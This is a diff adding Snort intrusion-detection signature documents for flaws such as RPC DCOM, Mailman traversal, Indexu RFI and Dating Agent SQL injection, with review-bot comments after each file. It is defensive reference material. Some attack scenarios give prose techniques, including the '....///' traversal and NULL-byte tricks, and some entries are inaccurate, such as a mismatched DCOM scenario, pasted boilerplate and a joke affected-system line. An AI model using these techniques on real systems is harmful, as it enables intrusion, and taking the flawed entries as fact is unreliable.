+Apple Darwin Streamin Server, such that an attacker can gain information
+on the file system as an intelligence gathering activity for an attack 
+on vulnerable services.
+
+It is also possible for an attacker to inject malicious code into the 
+log file for the server, the impact of this would be to execute the code
+when viewed by the administrator.
+
+It is also directly vulnerable to cross site scripting issues.
+
+--
+Affected Systems:
+	Apple Darwin Streaming Server 4.1.2
+	Apple Quicktime Streaming Server 4.1.1
+
+--
+Attack Scenarios:
+In the case of injecting code to the log files, the attacker would need 
+to make requests to the streaming server with the code inserted in the 
+request.
+
+The attacker can execute an attack on the file system contents using a 
+browser, the attacker needs to include a NULL byte in the request to 
+reveal the directory structure.
+
+The cross site scripting issue does not need anything specific to be 
+done.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the systems affected.
+
+Upgrade to the latest non affected versions of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6960
+http://www.securityfocus.com/bid/6990
+http://www.securityfocus.com/bid/6955
+http://www.securityfocus.com/bid/6956
+http://www.securityfocus.com/bid/6958
+
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0054
+
+--
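Review bot: the Summary is truncated: "parse_xml.cgi script on a webserver via the quicktime streaming port." starts mid-sentence and is missing its opening clause (the other files use the form "This event is generated when an attempt is made to ..."); the full sentence needs to be restored. "Apple Darwin Streamin Server" should be "Streaming", and the product is written "Quick Time Streaming Server" in Detailed Information but "Quicktime Streaming Server" in Affected Systems. The "Simple", "None Known" and "None Known" entries lack the periods used elsewhere, and there is a double blank line between the Bugtraq and CVE reference groups.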
--- /dev/null
+++ b/doc/signatures/3375.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3375
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
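Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") does not match Detailed Information, which describes a malformed DCOM request to an RPC port; one of the two sections is describing a different vulnerability and should be corrected so the file is internally consistent. "Simple. Expoit code exists." is a typo for "Exploit". Additional References is empty even though Corrective Action tells the reader to apply vendor patches; the relevant advisory should be listed.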
--- /dev/null
+++ b/doc/signatures/100000576.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000576
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
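Review bot: this file is a near-verbatim copy of the Indexu "inv_overdue.php" entry with the script name swapped, and carries the same defects: the third paragraph of Detailed Information is credential-validation boilerplate unrelated to the remote file include through the "admin_template_path" parameter of "cat_edit.php"; "running ona web server" needs "on a"; "an exploitation attempt has been attempted" is redundant; "attackers choosing" needs the possessive; lines end in trailing whitespace; the blank line before "--" is missing after Sid, Affected Systems and Contributors; and Additional References is empty. Fix the template once and regenerate both files.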
--- /dev/null
+++ b/doc/signatures/3131.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+3131
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in GNU Mailman.
+
+-- 
+Impact: 
+Information disclosure.
+
+--
+Detailed Information:
+GNU Mailman is used to manage mailing lists. It is written in Python and
+is available on a variety of platforms.
+
+GNU Mailman when used with webservers that do not remove extra slashes
+from URLs, is prone to a directory traversal attack that may allow an
+attacker access to sensitive files on an affected system.
+
+--
+Affected Systems:
+	GNU Mailman in conjunction with Apache 1.3.x
+
+--
+Attack Scenarios: 
+An attacker can supply extra slashes and dots (....///) to a URL to
+escape the web root and access other parts of the host filesystem.
+
+-- 
+Ease of Attack: 
+Simple. Exploit software is not required.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
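Review bot: there is a stray blank line between the "-- " separator and "Corrective Action:" that appears nowhere else in this file or the set. Separators alternate between "--" and "-- " (trailing space), and "Rule: ", "Sid: ", "Summary: ", "Impact: ", "Attack Scenarios: ", "Ease of Attack: ", "Corrective Action: " and "Contributors: " all carry trailing whitespace. Affected Systems names only "GNU Mailman in conjunction with Apache 1.3.x" while Detailed Information generalises to "webservers that do not remove extra slashes from URLs"; stating the affected Mailman versions would make the two consistent. Additional References is empty.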
--- /dev/null
+++ b/doc/signatures/556.txt
@@ -0,0 +1,93 @@
+Rule:  
+
+--
+
+Sid:
+
+556
+
+--
+
+Summary:
+
+A network-internal client has connected to an external GNUTella server
+and issued a connect attempt to begin communications.
+
+--
+
+Impact:
+
+Possible policy violation.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella client has been detected
+on your network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella client installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+It is possible for an inside attack to take place by using peer-to-peer
+clients to transfer corporate data from an internal resource to an
+external third party.
+
+--
+
+Ease of Attack:
+Simple. This is peer-to-peer activity.
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA CONNECT" on all ports.  As a
+result, any email, web page, or other network content that discusses the
+protocol and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+Gnutella Protocol
+http://rfc-gnutella.sourceforge.net/developer/testing/
+
+--
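Review bot: this file's layout differs from the rest of the set: a blank line separates every field name from its body ("Sid:" / "" / "556") and the "--" separators are padded with blank lines on both sides, whereas the other signature files put the value directly under the field name and use a single blank line before each separator. "Rule:  " has two trailing spaces and one "-- " separator has one. The name alternates between "GNUTella" and "Gnutella" in Additional References. The False Positives text is the model the rest of the set should follow, since it states exactly what the rule matches ("GNUTELLA CONNECT" on all ports) and what legitimate traffic will therefore trigger it.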
--- /dev/null
+++ b/doc/signatures/1253.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1253
+
+--
+Summary:
+This event is generated after a sucessful exploit of the BSD derived Telnet daemon.
+
+--
+Impact:
+Remote root access.  This may or may not indicate a successful root 
+compromise of a telnet server.
+
+--
+Detailed Information:
+This event is generated after a possible sucessful attempt to compromise
+a server running a BSD derived version of Telnet. A buffer overflow
+condition exists that may present an attacker with the opportunity to
+execute code of their choosing.
+
+The attacker does not need to login to the server to exploit this
+vulnerability, only a connection to the server is needed.
+
+--
+Affected Systems:
+	Multiple Vendor Telnet servers running versions of telnetd derived
+	from the BSD telnet daemon.
+
+--
+Attack Scenarios:
+An attacker may utilize one of the available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are publicly available. This vulnerability may
+also be exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
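Review bot: "sucessful" appears twice (Summary and Detailed Information) for "successful". The Summary line exceeds the wrap width used in the rest of the file. Impact states "Remote root access." and then "This may or may not indicate a successful root compromise", which reads as contradictory; "Possible remote root compromise." or similar would match the "possible sucessful attempt" wording in Detailed Information. Additional References is empty.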
--- /dev/null
+++ b/doc/signatures/1325.txt
@@ -0,0 +1,108 @@
+Rule:
+
+--
+Sid:
+1325
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in implementations of Secure Shell (ssh) version 1.
+
+NOTE: This rule is NOT enabled by default. The rule looks for the
+overflow pattern and as such can generate false positive events.
+
+--
+Impact:
+A buffer overflow will allow an attack to execute any arbitrary commands
+with the privileges of the root user, leading to full compromise of the 
+system and perhaps other systems as well.
+
+--
+Detailed Information:
+SSH is a secure replacement for telnet/ftp/r* commands. Both commercial 
+and non-commercial implementations are available.
+
+The vulnerability exists in the integer calculation in SSH version 1 or 
+SSH version 2 with a backward compatibility enabled.
+
+By sending a crafted packet to SSH daemon, an attacker could manipulate 
+the return address of the affected function call, allowing arbitrary 
+code execution on the target system.
+
+A protocol weakness in SSH1 opened all compliant servers to an
+information integrity vulnerability allowing block cipher-encrypted
+packets to be modified silently by an intermediary attacker.  Patches
+were developed to defend against this weakness, but several servers
+contained an exploitable integer overflow within detection code.
+
+A successful attack will allow corruption of the ssh daemon, allowing
+code to be run with its privileges.
+
+--
+Affected Systems:
+	Cisco IOS 12.0S
+	Cisco IOS 12.1xx-12.2xx
+	SSH Communications Security SSH 2.x and 3.x 
+	SSH Communications Security SSH 1.2.23-1.2.31
+	F-Secure SSH versions prior to 1.3.11-2
+	OpenSSH versions prior to 2.3.0
+	Systems running the Matrix as seen in Reloaded.
+
+--
+Attack Scenarios:
+A vulnerable machine may be probed using any banner grabber. 
+An attacker then attempts to overflow the integer calculations buffer 
+and execute /bin/sh.
+
+Once a session is initiated with the remote SSH server and block
+ciphering is agreed upon, successfully forcing a CRC32 check opens up
+room for the exploit (which is publically available).  The integer
+overflow is generally a brute-force method, which may generate several
+log lines of the form:
+
+hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network
+attack detected
+
+--
+Ease of Attack:
+Simple. Scanners and exploits are available.
+
+--
+False Positives:
+Possible (especially in the face of null encryption), but unlikely.
+Look for several log lines of the type described above.
+
+--
+False Negatives:
+This rule works by looking for "filler space" in the exploit, used
+to properly size a heap overflow.  Clever exploits can quite easily
+change the information placed here.
+
+--
+Corrective Action:
+Use access control restrictions ("AllowHosts" or "DenyHosts)
+
+Disable SSH version 1 support
+
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com) and Nick Black, Reflex Security <dank@reflexsecurity.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+CERT Advisory:
+http://www.cert.org/advisories/CA-2001-35.html
+
+--
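Review bot: "Systems running the Matrix as seen in Reloaded." in Affected Systems is a joke entry and should not ship in the documentation. In Corrective Action, "Use access control restrictions ("AllowHosts" or "DenyHosts)" has an unbalanced quote, and the four Corrective Action lines lack terminal periods. "allow an attack to execute any arbitrary commands" should be "an attacker"; "publically" should be "publicly". The sample log line under Attack Scenarios ("hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected") is the most useful triage detail in the file; since False Positives refers to "log lines of the type described above", consider repeating or moving it there.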
--- /dev/null
+++ b/doc/signatures/100000541.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000541
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "picture.php" with SQL commands being passed as the "pid" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "pid" parameter in the "picture.php" script used by the 
+"Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
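Review bot: the third paragraph of Detailed Information (`This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host ...`) is the authentication-bypass template text and does not describe the SQL injection through the `pid` parameter of `picture.php` that the Summary documents; drop it or replace it with what the rule actually matches. Also: the separators after `100000541`, after `All systems running CGI applications using Dating Agent` and after the Contributors list lack the blank line used elsewhere in the file, `running ona web server` should be `on a web server`, and `an exploitation attempt has been attempted` is redundant (`that exploitation has been attempted`). Additional References cites only a generic SQL injection primer; a vendor advisory or Bugtraq/CVE entry for the Dating Agent issue would let the reader verify the claim that exploits exist.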
--- /dev/null
+++ b/doc/signatures/3140.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3140
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
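Review bot: Corrective Action `Use Samba as an alternative` does not address the flaw as Detailed Information describes it: the vulnerability is triggered by a malicious server response to a Windows client request, so replacing the file server with Samba leaves vulnerable Windows clients exposed to any other SMB server they talk to. Affected Systems lists Windows 2003, 2000 and XP, but the only reference is the eEye advisory; add the Microsoft security bulletin and CVE entry so the version list can be verified. Minor: `windows file and print services` should capitalise Windows, and several `-- ` separator lines carry trailing whitespace.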
--- /dev/null
+++ b/doc/signatures/1579.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1579
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
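Review bot: the Affected Systems and Additional References sections are both empty, so the reader cannot tell which web server or application the rule was written for; either name the product(s) or state that the rule is generic. Typo in Detailed Information: `running ona web server` should be `running on a web server`.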
--- /dev/null
+++ b/doc/signatures/121-1.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-1
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a fixed
+scale scanner limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
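Review bot: two blank lines precede `Rule:` at the top of the file, whereas the other signature docs start with `Rule:` directly. Typos: `reconnaisance` should be `reconnaissance` and `consititute` should be `constitute`. In Corrective Action, `Apply any appropriate vendor supplied patches as appropriate` uses 'appropriate' twice; `Apply any appropriate vendor supplied patches` is enough. The Sid `121-1` is formatted differently from every other file (a generator:sid style value rather than a bare number); a short note in the Summary that this is a pre-processor event identifier would avoid confusion. False Negatives reads `None Known.` while the rest of the file uses lowercase `known`.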
--- /dev/null
+++ b/doc/signatures/485.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+485
+
+--
+Summary:
+This event is generated when a router was unable to forward a packet due
+to filtering and used the Internet Control Message Protocol to alert
+involved hosts.
+
+--
+Impact:
+Unknown. This particular message is meant only to be informative but can be
+indicative of malicious activity (spoofed traffic, DoS).
+
+--
+Detailed Information:
+A packet sent between two points on a network was administratively
+prohibited via filtering of some sort. The host or device performing the
+filtering returned an ICMP message informing the apparent source host
+that filtering had been done.
+
+--
+Affected Systems:
+	All systems.
+
+--
+Attack Scenarios:
+In a DoS attack it is common to to use spoofed source addresses.  If
+and when the traffic gets filtered and an ICMP message is returned,
+the spoofed source address will be the recipient of the ICMP message.
+A similar situation may occur when a large portscan is occuring and an
+attempt is made to mask the true source of the scan by using spoofed
+source addresses.  
+
+--
+Ease of Attack:
+Simple. Tools are readily available that can craft arbitrary ICMP
+packets. It is also possible to spoof packets using arbitrary
+addresses potentially causing intermediary routers to generate ICMP
+messages.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+None needed unless messages become excessive or appear to be invalid. 
+
+Determine what traffic caused this particular ICMP message to be
+generated and act accordingly.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RFC 1812:
+ftp://ftp.isi.edu/in-notes/rfc1812.txt
+
+--
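Review bot: doubled word in Attack Scenarios: `it is common to to use spoofed source addresses` should be `to use`, and `occuring` should be `occurring`. The Summary says the router `used the Internet Control Message Protocol to alert involved hosts`, while Detailed Information correctly states that the ICMP message goes only to the apparent source host; aligning the Summary with that avoids implying the destination is notified as well. Trailing whitespace on `source addresses.  `, on `appear to be invalid. ` and on the `-- ` separator before Additional References.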
--- /dev/null
+++ b/doc/signatures/3149.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3149
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Microsoft Internet Explorer.
+
+--
+Impact:
+Serious. Code execution is possible leading to unauthorized
+administrative access to the target host.
+
+--
+Detailed Information:
+Microsoft Internet Explorer uses the Object tag to identify ActiveX
+controls sometimes used in web content.
+
+A programming error in the processing of a buffer that handles the
+"item" parameter of an object tag can lead to the exposure of a buffer
+overflow condition. An attacker may be able to overflow this buffer and
+supply code of their choosing to be executed on the system with the
+privileges of the administrative account.
+
+The procedure that checks the length of a buffer that handles the item
+parameter may be bypassed by using the slash character either directly
+or via encoding methods. This vulnerability may be exploited whenever
+Internet Explorer is used to read HTML files.
+
+--
+Affected Systems:
+	Systems using Microsoft Windows
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting extra data into the input
+parameter of a malicious html file. The attacker may then insert code of
+their choosing to either run commands on the system or execute the code
+with the privileges of the administrative account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
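Review bot: Affected Systems (`Systems using Microsoft Windows`) and the empty Additional References leave the reader without the Internet Explorer versions concerned or the vendor bulletin for the `item` parameter overflow that Detailed Information describes; add the Microsoft bulletin and the affected IE versions. Minor: `malicious html file` should be `HTML file`, matching `HTML files` two paragraphs earlier.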
--- /dev/null
+++ b/doc/signatures/1750.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid: 1750
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a 
+potential weakness on a host running Microsoft Internet Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit 
+potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation 
+on the host, this may be the prelude to an attack against that host
+using that information. Specifically, this event indicates an attempt to
+retrieve the file "users.xml" which may contain username and password
+information for the host.
+
+--
+Affected Systems:
+	Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS 
+implementation. The attacker might then gain administrator access to the site, 
+deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken 
+to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpguide/html/cpconusercredentialsfileusersxml.asp
+
+--
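Review bot: `Sid: 1750` puts the number on the heading line and is followed by two blank lines, whereas every other file puts the sid on its own line under `Sid:` with a single blank line before the separator. Impact reads `Information gathering possible administrator access.` and needs a connective, e.g. `Information gathering, possibly leading to administrator access.` Detailed Information names the requested file `users.xml`, which is the right level of detail and is supported by the Microsoft reference; repeating the filename in the Summary would make it visible at a glance. `None Known.` in False Positives and False Negatives differs from the lowercase `known` used in the other docs.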
--- /dev/null
+++ b/doc/signatures/100000853.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000853
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "settings.html" using a remote file being passed as the "language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "language" parameter in the "settings.html" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
